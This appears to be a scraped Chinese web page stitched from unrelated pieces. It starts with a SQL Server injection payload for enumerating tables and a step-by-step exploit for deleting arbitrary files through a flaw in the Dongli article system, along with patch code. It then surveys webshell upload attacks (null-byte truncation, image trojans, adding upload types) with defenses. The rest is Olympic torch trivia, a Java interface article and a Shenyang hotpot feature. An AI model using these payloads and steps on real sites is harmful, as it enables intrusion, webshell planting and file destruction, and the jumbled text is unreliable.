2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示

注：因必殺技是我研究N久的心得，經多次改良，成功率極高。請不要用於不合法用途上，否則後果自負。

[N] = 第N個表
ID=1 and (Select top 1 name from(Select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1

休  闲 居    编   辑

其它附图:

发现漏洞  

朋友使用的是动力文章系统3.51版，找来找去也没有发现有哪个地方存在“注入点”，以前发现的打印页面的注入漏洞也被补上了，因为打了最 新的安全补丁，也就不存在上传扩展名为CER类的ASP木马的可能了。说实在的，我是很佩服Webboy的水平，同样是教师，我就没办法写出这样优秀的网 站管理系统，呵呵。

找不到注入点，就只能去找找有没有逻辑错误了。无法上传文件就试着下载文件，无法获取管理权，就试试去删除文件。我在本机上安装了同样版本动力文章系统，思路换了好几个方向，还好，发现漏洞了。存在问题的文件是User_ArticleSave.asp。  

1．分析：动力文章系统有个很好的功能，在线编辑文章时可以上传文件（图片），插入文件（图片），在保存文章时，系统将检测那些已经上传的 文件是否使用，如果发现某一文件名并没有出现在文章内容中，也没有被设为首页图片，就自动删除文件。这样能够保证网站的Uploadfiles目录中不会 存在垃圾文件。这些文件名就存放在Uploadfiles这个隐藏的对象中。

2．疑问：如果我们手工在Uploadfiles中填入网站内某一重要的文件名，如：首页文件“/Index.asp”（使用相对网站根目 录的绝对路径），递交表单时，系统检测到“/Index.asp” 并没有出现在文章内容中，也没有被设为首页图片，岂不是也会自动删除Index.asp文件？

漏洞测试  

马上在本机上进行测试，成功！接下来去下载3.6版本的动力系统（最新版本），同样成功！可以说这个漏洞存在目前动力的所有系统！因为动易系统时采用安装组件的方式，感到有点烦，就没有继续测试，理论上肯定也是成功的，有兴趣的朋友可以试试。  

漏洞利用过程：  

（1）把添加文章的页面保存在本地；  

（2）修改页面中的表单递交地址，如将“document.myform.action='User_ArticleSave.asp'” 中的“User_ArticleSave.asp”改为“http://127.0.0.1/User_ArticleSave.asp （“127.0.0.1”要改为测试网站的真实网址）“，并把“”中的“hidden”改为“text”。  

（3）随便填写一些必要的文字，在出现的Uploadfiles对象中填入你要删除的文件的绝对路径，如“/index.asp”。  

（4）递交表单。  

这里有几点需要注意的：你必须要有一个可以发表文章的账户，一般使用动力文章系统的网站都开放用户注册的；并非只有这个文件存在漏洞，其它如上传资源之类的页面也存在同样漏洞。  

防范措施  

防护的措施有以下几种，大家可以选择适合自己的方式：  

1．关闭“删除无用的上传文件”功能，把User_ArticleSave.asp文件中的相应语句删除或用“’”注释，这样有点消极。  

2．有些人首先想到的解决方法可能会是“禁止站外递交“。动力系统的管理员管理页面是有这样功能的，可以把这样的功能加在用户管理页面中， 相关分析《黑客防线》前几期已经讲得很清楚了，不再重复。表面上看这种方式可以防止漏洞，其实这种解决方法不是很彻底，我至少有两种方法来重新利用这个漏 洞，如捕获、修改、重新发送数据包。

3．等待Webboy的补丁，我这里先写一段代码让大家先凑合着用：  

'删除无用的上传文件  

if ObjInstalled=True and Uploadfiles<>"" then  

dim fso,strRubbishFile  

Set fso = Server.CreateObject("Scripting.FileSystemObject")  

if instr(Uploadfiles,"")>1 then  

dim arrUploadfiles,intTemp  

arrUploadfiles=split(Uploadfiles,"")  

Uploadfiles=""  

for intTemp=0 to ubound(arrUploadfiles)  

if instr(Content,arrUploadfiles(intTemp))<=0 and arrUploadfiles(intTemp)<>DefaultPicUrl then  

if UCase(left(arrUploadfiles(intTemp),len(SaveUpFilesPath)))<>ucase(SaveUpFilesPath) or instr(arrUploadfiles(intTemp),"../")>0 then

• " & arrUploadfiles(intTemp) & "包含非法字符，已被清除！"  

  Uploadfiles=""  

  else  

  strRubbishFile=server.MapPath(arrUploadfiles(intTemp))  

  if fso.FileExists(strRubbishFile) then  

  fso.DeleteFile(strRubbishFile)  

  response.write "
  

• " & arrUploadfiles(intTemp) & "在文章中没有用到，也没有被设为首页图片，所以已经被删除！"  

  end if  

  end if  

  else  

  if intTemp=0 then  

  Uploadfiles=arrUploadfiles(intTemp)  

  else  

  Uploadfiles=Uploadfiles & "" & arrUploadfiles(intTemp)  

  end if  

  end if  

  next  

  else  

  if instr(Content,Uploadfiles)<=0 and Uploadfiles<>DefaultPicUrl then  

  if ucase(left(Uploadfiles,len(SaveUpFilesPath)))<>ucase(SaveUpFilesPath) or instr(Uploadfiles,"../")>0 then  

  response.write "
  

• " & Uploadfiles & "包含非法字符，已被清除！"  

  Uploadfiles=""  

  else  

  strRubbishFile=server.MapPath(Uploadfiles)  

  if fso.FileExists(strRubbishFile) then  

  fso.DeleteFile(strRubbishFile)  

  response.write "
  

• " & Uploadfiles & "在文章中没有用到，也没有被设为首页图片，所以已经被删除！"  

  end if  

  Uploadfiles=""  

  end if  

  end if  

  set fso=nothing  

  end If  

  '结束  

   

  4．其实以上的方法都不能从根本上解决这个漏洞，最好的方式就是换一种方式编程来实现“删除没有用到的文件”这一功能，比如采用Session来记录上传文件名等等。  

   

  目前动力文章系统是使用范围最广的免费代码之一，并且有好多系统模仿了动力系统的这一功能（比如我，呵呵）。利用该漏洞是十分狠毒的，真正 的损人不利己，因为被这样删除的文件可不是能在“回收站”中找回来的！公开这个漏洞的目的只是希望每个程序员在编写脚本的时候能够多想想安全，不要出现类 似的问题。

　　1、Access数据库的存储隐患

　　在ASP＋Access应用系统中，如果获得或者猜到Access数据库的存储路径和数据库名，则该数据库就可以被下载到本地。例如：对于网上 书店的Access数据库，人们一般命名为book.mdb、store.mdb等，而存储的路径一般为“URL/database”或干脆放在根目录 （“URL/”）下。这样，只要在浏览器地址栏中敲入地址：“URL/database/store.mdb”，就可以轻易地把store.mdb下载到 本地的机器中。 

　　2.、Access数据库的解密隐患

　　由于Access数据库的加密机制非常简单，所以即使数据库设置了密码，解密也很容易。该数据库系统通过将用户输入的密码与某一固定密钥进行异 或来形成一个加密串，并将其存储在＊.mdb文件中从地址“＆H42”开始的区域内。由于异或操作的特点是“经过两次异或就恢复原值”，因此，用这一密钥 与＊.mdb文件中的加密串进行第二次异或操作，就可以轻松地得到Access数据库的密码。基于这种原理，可以很容易地编制出解密程序。

　　由此可见，无论是否设置了数据库密码，只要数据库被下载，其信息就没有任何安全性可言了。 

　　3、源代码的安全隐患  

　　由于ASP程序采用的是非编译性语言，这大大降低了程序源代码的安全性。任何人只要进入站点，就可以获得源代码，从而造成ASP应用程序源代码的泄露。 

　　4、程序设计中的安全隐患

　　ASP代码利用表单（form）实现与用户交互的功能，而相应的内容会反映在浏览器的地址栏中，如果不采用适当的安全措施，只要记下这些内容， 就可以绕过验证直接进入某一页面。例如在浏览器中敲入“……page.asp?x=1”，即可不经过表单页面直接进入满足“x=1”条件的页面。因此，在 设计验证或注册页面时，必须采取特殊措施来避免此类问题的发生。

　　提高数据库的安全性由于Access数据库加密机制过于简单，因此，如何有效地防止Access数据库被下载,就成了提高ASP＋Access解决方案安全性的重中之重。

　　1、非常规命名法

　　防止数据库被找到的简便方法是为Access数据库文件起一个复杂的非常规名字，并把它存放在多层目录下。例如，对于网上书店的数据库文件，不要简单地命名为“book.mdb”或“store.mdb”，而是要起个非常规的名字，例如： 

　　faq19jhsvzbal.mdb，再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之类的深层目录下。这样，对于一些通过猜的方式得到Access数据库文件名的非法访问方法起到了有效的阻止作用。 

　　2、使用ODBC数据源  

　　在ASP程序设计中，应尽量使用ODBC数据源，不要把数据库名直接写在程序中，否则，数据库名将随ASP源代码的失密而一同失密。例如： 

　　DBPath = Server.MapPath(“./akkjj16t/ 

　　kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ”)  _com

　　conn.Open “driver={Microsoft Access Driver (＊.mdb)};dbq=” ＆ DBPath 

　　可见，即使数据库名字起得再怪异，隐藏的目录再深，ASP源代码失密后，数据库也很容易被下载下来。如果使用ODBC数据源，就不会存在这样的问题了： 

　　conn.open “ODBC－DSN名”  

　　对ASP页面进行加密为有效地防止ASP源代码泄露，可以对ASP页面进行加密。一般有两种方法对ASP页面进行加密。一种是使用组件技术将编 程逻辑封装入DLL之中；另一种是使用微软的Script Encoder对ASP页面进行加密。笔者认为，使用组件技术存在的主要问题是每段代码均需组件化，操作比较烦琐，工作量较大；而使用Script Encoder对ASP页面进行加密，操作简单、收效良好。 

　　Script Encoder方法具有许多优点：  

　　1、HTML仍具有很好的可编辑性。Script Encoder只加密在HTML页面中嵌入的ASP代码，其他部分仍保持不变，这就使得我们仍然可以使用FrontPage或Dreamweaver等常 用网页编辑工具对HTML部分进行修改、完善，只是不能对ASP加密部分进行修改，否则将导致文件失效。 

　　2、操作简单。只要掌握几个命令行参数即可。Script Encoder的运行程序是screnc.exe，其使用方法如下： 

　　screnc [/s] [/f] [/xl] [/l defLanguage ] [/e defExtension] inputfile outputfile  

　　其中的参数含义如下： 

　　s：屏蔽屏幕输出； 

　　f：指定输出文件是否覆盖同名输入文件；  站.长站

　　xl：是否在.asp文件的顶部添加@Language指令；  

　　l：defLanguag指定缺省的脚本语言； 

　　e：defExtension 指定待加密文件的扩展名。 

　　3、可以批量加密文件。使用Script Encoder可以对当前目录中的所有的ASP 文件进行加密，并把加密后的文件统一输出到相应的目录中。例如：  

　　screnc ＊.asp c:\temp  

　　4、Script Encoder是免费软件。该加密软件可以从微软网站下载：  

　　http://msdn.microsoft.com/scripting/vbscript/download/x86/sce10en.exe。下载后，运行安装即可。  

　　利用Session对象进行注册验证 

　　为防止未经注册的用户绕过注册界面直接进入应用系统，可以采用Session对象进行注册验证。Session对象最大的优点是可以把某用户的信息保留下来，让后续的网页读取。例如，要设计如图1所示的注册页面。 

　　设计要求用户注册成功后系统启动hrmis.asp?page=1页面。如果不采用Session对象进行注册验证，则用户在浏览器中敲入 “URL/hrmis.asp?page=1”即可绕过注册界面，直接进入系统。利用Session对象可以有效阻止这一情况的发生。相关的程序代码如 下： 

　　<％  

　　' 读取用户输入的账号和密码  .com

　　UserID = Request(“UserID”) 

　　Password = Request(“Password”) 

　　' 检查UserID 及Password 是否正确（实际程序可能会比较复杂）  

　　If UserID <>“hrmis” Or Password <> 

　　“password” Then 

　　Response.Write “账号错误！” 

　　Response.End  

　　End If 

　　'将Session 对象设置为通过验证状态 

　　Session(“Passed”) = True  

　　％> 

　　进入应用程序后，首先进行验证： 

　　<％ 

　　'如果未通过验证，返回Login状态 

　　If Not Session(“Passed”) Then  

　　Response.Redirect “login.htm”  

　　End If 

　　％> 

雪貂搜寻软件可以输入对万维网搜索引擎网站中特定组群的搜寻，比如世界性新闻组网络系统（Usenet）的新闻组群、世界e-mail地址录、在线聊天系统（IRC）成员清单以及一些能够被有效得找到的可搜索的公众数据库。　　

雪貂搜寻软件不能与crawler软件混淆，crawler是一种搜索引擎用来从许多网页上搜集数据的程序，这些网页会被编成链接目录。  

一、能直接上传asp文件的漏洞

如果网站有  上传页面，就要警惕直接上传asp文件漏洞。例如去年流行的动网5.0/6.0论坛，就有个 upfile.asp上传页面，该页面对上传文件扩展名过滤不严，导致黑客能直接上传asp文件，因此黑客只要打开upfile.asp页，直接上传， asp木马即可拿到webshell、拥有网站的管理员控制权。

除此之外，目前已发现的上传漏洞，还有动感购物商城、动力上传漏洞、乔客上传漏洞等，只要运行“明小子Domain3.5”，点击“综合上传”，即可看到这些著名的上传漏洞。

像明小子这样的上传漏洞利用工具如今还有很多，例如上传漏洞程序4in1、动易2005上传漏洞利用工具、雷池新闻系统上传漏洞利用工具、MSSQL上传漏洞利用工具等等，使用此类工具，只需填写上传页面网址和Cookies，即可成功入侵网站。

【防范方法】：为了防范此类漏洞，建议网站采用最新版（例如动网7.1以上版本）程序建站，因为最新版程序一般都没有直接上传漏洞，当然删除有漏洞的上传页面，将会最安全，这样黑客再也不可能利用上传漏洞入侵了！

如果不能删除上传页面，为了防范入侵，建议在上传程序中添加安全代码，禁止上传asp\asa\js\exe\com等类文件，这需要管理者能看懂asp程序。

二、00上传漏洞

目前网上流行的所有无组件上传类都存在此类漏洞——即黑客利用“抓包嗅探”、“ULTRAEDIT”和“网络军刀”等工具伪造IP包，突破服务器端对上传文件名、路径的判断，巧妙上传ASP、ASA、CGI、CDX、CER、ASPX类型的木马。

例 如黑客上传了一个木马文件（xiaomm.asp空格.jpg），由于上传程序不能正确判断含有十六进制00的文件名或路径，于是就出现了漏洞，当上传程 序接收到“xiaomm.asp空格.jpg”文件名数据时，一旦发现xiaomm.asp后面还有空格（十六进制的00），它就不会再读下去，于是上传 的文件在服务器上就会被保存成xiaomm.asp，因此上传木马就成功了！

【防范方法】：最安全的防范办法就是删除上传页面。

三、图片木马上传漏洞

有的网站（例如动网7.1SP1博客功能），其后台管理中可以恢复/备份数据库，这会被黑客用来进行图片木马入侵。

图 片木马入侵过程如下：首先将本地木马（例如F:\labxw\xiaomm.asp）扩展名改为.gif，然后打开上传页面，上传这个木马（例如F:\ labxw\xiaomm.gif）；再通过注入法拿到后台管理员的账号密码，溜进网站后台管理中，使用备份数据库功能将.gif木马备份成.asp木马 （例如xiaomm.asp），即在“备份数据库路径（相对）”输入刚才图片上传后得到的路径，在“目标数据库路径”输入：xiaomm.asp，提示恢 复数据库成功；现在打开IE，输入刚才恢复数据库的asp路径，木马就能运行了。

【防范方法】：删除后台管理中的恢复/备份数据库功能。

四、添加上传类型漏洞

如今大多数论坛后台中都允许添加上传类型，这也是个不小的漏洞！只要黑客用注入法拿到后台管理员账号密码，然后进入后台添加上传类型，在上传页面中就能直接上传木马！

例如bbsxp后 台中允许添加asa|asP类型，通过添加操作后，就可以上传这两类文件了；ewebeditor后台也能添加asa类型，添加完毕即可直接上传asa后 缀的木马；而LeadBbs3.14后台也允许在上传类型中增加asp类型，不过添加时asp后面必须有个空格，然后在前台即可上传ASP木马（在木马文 件扩展名.asp后面也要加个空格）。

【防范方法】：删除后台管理中的添加上传类型功能。

五、通用防范上传漏洞入侵秘笈：将服务器端的组件改名

众所周知，ASP木马主要是通过三种组件FileSystemObject、WScript.Shell和Shell.Application来操作的，因此只要你在服务器上修改注册表，将这三种组件改名，即可禁止木马运行、防范黑客入侵了。这一招能防范所有类型的上传漏洞，因为即使黑客将木马成功上传到服务器中，但是由于组件已经被改名，木马程序也是无法正常运行的！

1968年法国马赛港口，一位潜水员举着火炬游过（火焰在水面以上）；

2000年澳大利亚悉尼，一位潜水员在大堡礁海底潜水，首次让火炬沉到了水下。  

用卫星传递

1976年加拿大蒙特利尔，东道主别出心裁地“玩”起高科技，火种到达雅典后，只花半秒钟时间，用激光传至太空中的人造卫星，再反射到加拿大首都渥太华，然后才进行了短距离的传递。

不过因为这种做法有悖于火炬传递的宗旨，遭到非议。

收钱的传递

1984年美国洛杉矶，美国将商业机制引进火炬接力。组织者在美国划定10000公里路线，只要交纳3000美元，报名者便可参加1公里接力，而且能够得到一个复制的火炬纪念品。

虽然这样的做法为组委会集资到3000万美元，但由于反对者众多而被禁止。

婴儿的传递

1988年韩国汉城，10名1988年出生的婴儿和他们的母亲一起把火炬送到了目的地，这也是历史上参与人数最多、参与者年龄最小的一次火炬传递活动。

火炬遭“抢劫”

2000年悉尼，在奥运会开幕式前，当接力者持火炬行进在海边时，一名观众突然冲出，抢走火炬，要扔向大海。幸亏保安人员及时赶到夺回火炬。

理解抽象类

abstractclass和interface在Java语言中都是用来进行抽象类（本文 中的抽象类并非从abstractclass翻译而来，它表示的是一个抽象体，而abstractclass为Java语言中用于定义抽象类的一种方法， 请读者注意区分）定义的，那么什么是抽象类，使用抽象类能为我们带来什么好处呢？

在面向对象的概念中，我们知道所有的对象都是通过类来描绘的，但是反过来却不是这样。并不是 所有的类都是用来描绘对象的，如果一个类中没有包含足够的信息来描绘一个具体的对象，这样的类就是抽象类。抽象类往往用来表征我们在对问题领域进行分析、 设计中得出的抽象概念，是对一系列看上去不同，但是本质上相同的具体概念的抽象。比如：如果我们进行一个图形编辑软件的开发，就会发现问题领域存在着圆、 三角形这样一些具体概念，它们是不同的，但是它们又都属于形状这样一个概念，形状这个概念在问题领域是不存在的，它就是一个抽象概念。正是因为抽象的概念 在问题领域没有对应的具体概念，所以用以表征抽象概念的抽象类是不能够实例化的。

在面向对象领域，抽象类主要用来进行类型隐藏。我们可以构造出一个固定的一组行为的抽象描 述，但是这组行为却能够有任意个可能的具体实现方式。这个抽象描述就是抽象类，而这一组任意个可能的具体实现则表现为所有可能的派生类。模块可以操作一个 抽象体。由于模块依赖于一个固定的抽象体，因此它可以是不允许修改的；同时，通过从这个抽象体派生，也可扩展此模块的行为功能。熟悉OCP的读者一定知 道，为了能够实现面向对象设计的一个最核心的原则OCP(Open-ClosedPrinciple)，抽象类是其中的关键所在。

从语法定义层面看abstractclass和interface

在语法层面，Java语言对于abstractclass和interface给出了不同的定义方式，下面以定义一个名为Demo的抽象类为例来说明这种不同。

使用abstractclass的方式定义Demo抽象类的方式如下：

abstractclassDemo｛

abstractvoidmethod1();

abstractvoidmethod2();

…

｝

使用interface的方式定义Demo抽象类的方式如下：

interfaceDemo{

voidmethod1();

voidmethod2();

…

}

在abstractclass方式中，Demo可以有自己的数据成员，也可以有非 abstarct的成员方法，而在interface方式的实现中，Demo只能够有静态的不能被修改的数据成员（也就是必须是staticfinal 的，不过在interface中一般不定义数据成员），所有的成员方法都是abstract的。从某种意义上说，interface是一种特殊形式的 abstractclass。

从编程的角度来看，abstractclass和interface都可以用来实现"designbycontract"的思想。但是在具体的使用上面还是有一些区别的。

首先，abstractclass在Java语言中表示的是一种继承关系，一个类只能使用一次继承关系。但是，一个类却可以实现多个interface。也许，这是Java语言的设计者在考虑Java对于多重继承的支持方面的一种折中考虑吧。

其次，在abstractclass的定义中，我们可以赋予方法的默认行为。但是在interface的定义中，方法却不能拥有默认行为，为了绕过这个限制，必须使用委托，但是这会增加一些复杂性，有时会造成很大的麻烦。

在抽象类中不能定义默认行为还存在另一个比较严重的问题，那就是可能会造成维护上的麻烦。因 为如果后来想修改类的界面（一般通过abstractclass或者interface来表示）以适应新的情况（比如，添加新的方法或者给已用的方法中添 加新的参数）时，就会非常的麻烦，可能要花费很多的时间（对于派生类很多的情况，尤为如此）。但是如果界面是通过abstractclass来实现的，那 么可能就只需要修改定义在abstractclass中的默认行为就可以了。

同样，如果不能在抽象类中定义默认行为，就会导致同样的方法实现出现在该抽象类的每一个派生类中，违反了"onerule，oneplace"原则，造成代码重复，同样不利于以后的维护。因此，在abstractclass和interface间进行选择时要非常的小心。

从设计理念层面看abstractclass和interface

上面主要从语法定义和编程的角度论述了abstractclass和interface的区 别，这些层面的区别是比较低层次的、非本质的。本小节将从另一个层面：abstractclass和interface所反映出的设计理念，来分析一下二 者的区别。作者认为，从这个层面进行分析才能理解二者概念的本质所在。

前面已经提到过，abstarctclass在Java语言中体现了一种继承关系，要想使得 继承关系合理，父类和派生类之间必须存在"isa"关系，即父类和派生类在概念本质上应该是相同的（参考文献〔3〕中有关于"isa"关系的大篇幅深入的 论述，有兴趣的读者可以参考）。对于interface来说则不然，并不要求interface的实现者和interface定义在概念本质上是一致的， 仅仅是实现了interface定义的契约而已。为了使论述便于理解，下面将通过一个简单的实例进行说明。

考虑这样一个例子，假设在我们的问题领域中有一个关于Door的抽象概念，该Door具有执行两个动作open和close，此时我们可以通过abstractclass或者interface来定义一个表示该抽象概念的类型，定义方式分别如下所示：

使用abstractclass方式定义Door：

abstractclassDoor{

abstractvoidopen();

abstractvoidclose()；

}

使用interface方式定义Door：

interfaceDoor{

voidopen();

voidclose();

}

其他具体的Door类型可以extends使用abstractclass方式定义的Door或者implements使用interface方式定义的Door。看起来好像使用abstractclass和interface没有大的区别。

如果现在要求Door还要具有报警的功能。我们该如何设计针对该例子的类结构呢（在本例中，主要是为了展示abstractclass和interface反映在设计理念上的区别，其他方面无关的问题都做了简化或者忽略）？下面将罗列出可能的解决方案，并从设计理念层面对这些不同的方案进行分析。

解决方案一：

简单的在Door的定义中增加一个alarm方法，如下：

abstractclassDoor{

abstractvoidopen();

abstractvoidclose()；

abstractvoidalarm();

}

或者

interfaceDoor{

voidopen();

voidclose();

voidalarm();

}

那么具有报警功能的AlarmDoor的定义方式如下：

classAlarmDoorextendsDoor{

voidopen(){…}

voidclose(){…}

voidalarm(){…}

}

或者

classAlarmDoorimplementsDoor｛

voidopen(){…}

voidclose(){…}

voidalarm(){…}

｝

这种方法违反了面向对象设计中的一个核心原则ISP （InterfaceSegregationPriciple），在Door的定义中把Door概念本身固有的行为方法和另外一个概念"报警器"的行为方 法混在了一起。这样引起的一个问题是那些仅仅依赖于Door这个概念的模块会因为"报警器"这个概念的改变（比如：修改alarm方法的参数）而改变，反之依然。

解决方案二：

既然open、close和alarm属于两个不同的概念，根据ISP原则应该把它们分别定义在代表这两个概念的抽象类中。定义方式有：这两个概念都使用abstractclass方式定义；两个概念都使用interface方式定义；一个概念使用abstractclass方式定义，另一个概念使用interface方式定义。

显然，由于Java语言不支持多重继承，所以两个概念都使用abstractclass方式定义是不可行的。后面两种方式都是可行的，但是对于它们的选择却反映出对于问题领域中的概念本质的理解、对于设计意图的反映是否正确、合理。我们一一来分析、说明。

如果两个概念都使用interface方式来定义，那么就反映出两个问题：1、我们可能没有理解清楚问题领域，AlarmDoor在概念本质上到底是Door还是报警器？2、如果我们对于问题领域的理解没有问题，比如：我们通过对于问题领域的分析发现AlarmDoor在概念本质上和Door是一致的，那么我们在实现时就没有能够正确的揭示我们的设计意图，因为在这两个概念的定义上（均使用interface方式定义）反映不出上述含义。

如果我们对于问题领域的理解是：AlarmDoor在概念本质上是Door，同时它有具有报 警的功能。我们该如何来设计、实现来明确的反映出我们的意思呢？前面已经说过，abstractclass在Java语言中表示一种继承关系，而继承关系 在本质上是"isa"关系。所以对于Door这个概念，我们应该使用abstarctclass方式来定义。另外，AlarmDoor又具有报警功能，说 明它又能够完成报警概念中定义的行为，所以报警概念可以通过interface方式定义。如下所示：

abstractclassDoor{

abstractvoidopen();

abstractvoidclose()；

}

interfaceAlarm{

voidalarm();

}

classAlarmDoorextendsDoorimplementsAlarm{

voidopen(){…}

voidclose(){…}

voidalarm(){…}

}

　　麻辣火锅很适合沈阳人豪放的性格■本报记者杨晟坤摄

  

<SCRIPT LANGUAGE="JavaScript1.1" xsrc="http://273.adsina.allyes.com/main/adfshow?user=AFP6_for_SINA|news|chinaPIP&db=sina&local=yes&js=on"></SCRIPT> <NOSCRIPT><A xhref="http://273.adsina.allyes.com/main/adfclick?user=AFP6_for_SINA|news|chinaPIP&db=sina"><IMG xsrc="http://273.adsina.allyes.com/main/adfshow?user=AFP6_for_SINA|news|chinaPIP&db=sina" WIDTH=360 HEIGHT=300 BORDER=0></a></NOSCRIPT>                     ad1= "CBD高尔夫有别墅"; link1= "http://sina.allyes.com/main/adfclick?db=sina&bid=34823,59586,59634&cid=0,0,0&sid=57128&advid=2628&camid=9110&show=ignore&url=http://www.h-cgolf.com/website/cbd_bs/index.htm"; //左上  ad2= "精装公寓 现房租售"; link2= "http://sina.allyes.com/main/adfclick?db=sina&bid=35525,60333,60385&cid=0,0,0&sid=57839&advid=2636&camid=9163&show=ignore&url=http://www.oexpress.com.cn/"; //右上  ad3= "新浪招贴 传媒新贵"; link3= "http://post.sina.com.cn/index_1100.php"; //左下  ad4= "新浪招贴 传媒新贵"; link4= "http://post.sina.com.cn/index_1100.php"; //右下   //浏览器类型变量 var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1;  //ie内容 function IEad(){   adCode = ''    document.write(adCode);      document.getElementById('ad_note').SetVariable("ad1", ad1);   document.getElementById('ad_note').SetVariable("ad2", ad2);   document.getElementById('ad_note').SetVariable("ad3", ad3);   document.getElementById('ad_note').SetVariable("ad4", ad4);      document.getElementById('ad_note').SetVariable("link1", link1);   document.getElementById('ad_note').SetVariable("link2", link2);   document.getElementById('ad_note').SetVariable("link3", link3);   document.getElementById('ad_note').SetVariable("link4", link4);  } //ns内容 function NSad(){  adCode = ''   +''   +' '   +''+ ad1 +''   +' '   +''+ ad2 +''   +' '   +''+ ad3 +''   +' '   +''+ ad4 +' '  document.write(adCode); }  //主过程 if(InternetExplorer == true){   IEad(); }else{   NSad(); } CBD高尔夫有别墅 精装公寓 现房租售 新浪招贴 传媒新贵 新浪招贴 传媒新贵

  

　　大块的冻豆腐是沈阳人吃火锅的必备法宝■资料图片

　　天南海北的各式调料都能在沈阳火锅店里找到■资料图片早在满族起兵关外之时，满族军 队曾与元朝军队发生过战争，军队需要吃饭，而时间又很紧迫，就想出了一种方法：支起个架子，或是用大锅，或是用自己的头盔或者战场上捡来的敌人的头盔放上 水，把打来的猎物切成片放在里面煮。这种吃法非常方便，不仅节省时间也便于很快投入下一次行军打仗。这便是火锅的雏形。

　　走在沈阳的大街小巷，红火的火锅店应接不暇。外面吐口唾沫都能结成冰，中间一块大玻璃布满哈气，水珠从玻璃顶一直滑到地上，露出一条条朦胧的曲线，里面则是热气腾腾，围锅而坐的人们高谈阔论，笑声不绝……

　　吃火锅就得到沈阳来！因为这里的冬天太冷，在这里吃火锅你会感到冰与火的洗礼到底是个啥滋味，也正是因为这个，爽朗、豪迈、不太会斤斤计较的沈阳人在这口锅里涮出了自己的精彩，吃出了自己的表情。

　　火锅究竟咋来的，说法不一，不过从沈阳故宫博物院研究员佟悦先生的研究来看，正是生长在关外这片黑土地上的满族先祖们才最具发明火锅的条件，也正是他们最后的问鼎中原，才使火锅有了在中华大地普及的空间与土壤。

　　八旗兵填饱肚子的“大黑锅”

　　兵起关外黑土地，又以八旗为记，席卷中华大地，建立了中国最后一个封建王朝，这就是 我们这块土地上曾经的先祖满族。“可以肯定地说，火锅是在北方发明的，因为历史记载可以看出，南方没有发明火锅的条件和迹象。而满族，作为游牧民族，正是 具备发明火锅客观条件的民族。”佟悦十分肯定地告诉记者。

　　关于火锅怎样产生的问题，佟悦说，早在满族起兵关外之时，满族军队曾与元朝军队发生 过战争，军队需要吃饭，而时间又很紧迫，就想出了一种方法：支起个架子，或是用大锅，或是用自己的头盔或者战场上捡来的敌人的头盔放上水，把打来的猎物切 成片放在里面煮。这种吃法非常方便，不仅节省时间也便于很快投入下一次行军打仗。这便是火锅的雏形。所以，火锅起初不是为美食而产生，而是为填饱肚子而产 生。

　　为什么说只有满族人能想到这种填饱肚子的方式呢？佟悦认为，当时关东地区的生产技术和生活水平都比较落后，从美食角度来讲，不可能做出像鲁菜、粤菜那样色香味俱全的食物。而火锅就不同了，它只需把肉、菜等食物扔到锅里就行了，所以容易受欢迎。

　　当然，除了佟悦先生讲到的关于火锅产生的研究外，记者还收集到了有关类似火锅最初产 生的一些非常有趣的传说。南宋时，一位名叫林洪的诗人，在其所著的《山家清供》里讲了一个涮兔肉片的故事。在当时，林洪前往武夷山拜访隐士止止师，止止师 住在武夷山九曲中之第六曲仙掌峰，当林洪快到山峰时，下起大雪，一只野兔飞奔于山岩中，因刚下雪岩石很滑，滚下石来，被林洪抓到，

　　林洪想烤来吃，于是问止止师会不会烧兔肉，止止师回答他说，“我在山中吃兔子是这样 的，在桌上放个生炭的小火炉，炉上架个汤锅，把兔肉切成薄片，用酒、酱、椒、桂做成调味汁，等汤开了夹着肉片在汤中涮熟，蘸着调味料吃。”随后发展到今 天，无论是各种肉类或蔬菜，皆可如此涮食。

　　曾经是一个王朝强盛与自信的象征

　　传说总是富有神秘色彩的，不过佟悦的说法则更为可信，他告诉记者，上世纪80年代的 时候，他曾在沈阳农村的满族人家里看到过这样的一幕景象：万字炕上放着一个炕桌，炕桌中间挖出了一个圆洞，然后主人拿来一个黑铁锅，放在圆洞上面，这个黑 铁锅是小灶用的（小灶是用来炒菜的小锅，所以对某人很照顾有“开小灶”的说法）。然后，满族人家炕上都有火盆，把火盆拽到炕桌底下，一顿火锅宴就可以开席 了。等到吃完了撤掉全部家什，往中间有圆洞的炕桌上盖一个木板，炕桌就又成为普通桌子了。

　　“现在吃火锅已经不稀奇了，但是在过去，却是一件非常奢侈的事情。”佟悦告诉记者，清朝时，只有皇帝能经常吃到火锅。

　　据记载，清乾隆四十八年正月初十，乾隆皇帝办了530桌宫廷火锅，其盛况可谓中国火锅之最。1796年，清嘉庆皇帝登基时，曾摆“千叟宴”，所用火锅达1550个，其规模堪称登峰造极，象征着一个王朝的强盛与自信。

　　反过来，老百姓对吃一顿火锅却不敢那么奢望了。佟悦告诉记者，在清末，满族人中间流传着一句顺口溜：穿蟒缎，服宫绸，铜火锅子羊羔肉。蟒缎、宫绸都是在满族人中间非常昂贵的东西，火锅能与它们并列，可见满族人对火锅的喜爱。

　　现年75岁的老沈阳赵成儒对火锅的回忆同样如数家珍：“这些年沈阳人吃火锅的器皿变化不大，但在燃料使用上的变化却很大。”他告诉记者，从柴火到木炭，从电炉、酒精到瓦斯、电磁炉，以木炭的使用历史最久，也最有风味，但也是最污染空气的一种方式。

　　“差不多70年代后，炭锅变成了瓦斯锅，瓦斯控制起火候来更方便，想大就大，想小就小，不过比较危险。”赵老不无感慨地说，“现在我们家吃火锅开始用电磁锅了，电磁锅干净、方便，但总觉得没了火，吃在嘴里的火锅就没啥风味了。”

　　冻豆腐捞火锅吃出沈阳人的豪迈

　　赵老所说的吃法是沈阳人在自家里用来调剂生活的家常火锅，算得上是“家家有本自念的经”，不过说到沈阳自身特色的火锅文化，那还得到街上那一家家火锅店去看看。

　　有人说，川味火锅讲究“坚守”。川味火锅几百年的历史，坚守着那锅老汤，那是老辈们 留下的“纯粹”，不得篡改，味就那个味，麻、辣、鲜，可就像一幅八卦图般变幻无穷，任时世变迁，人们就着一锅延续了多少年的老汤，涮着、品着几代人的喜乐 悲欢。鸡、鸭、鱼、肉、蔬菜、面食……可劲儿地涮，那锅老汤却从不动。

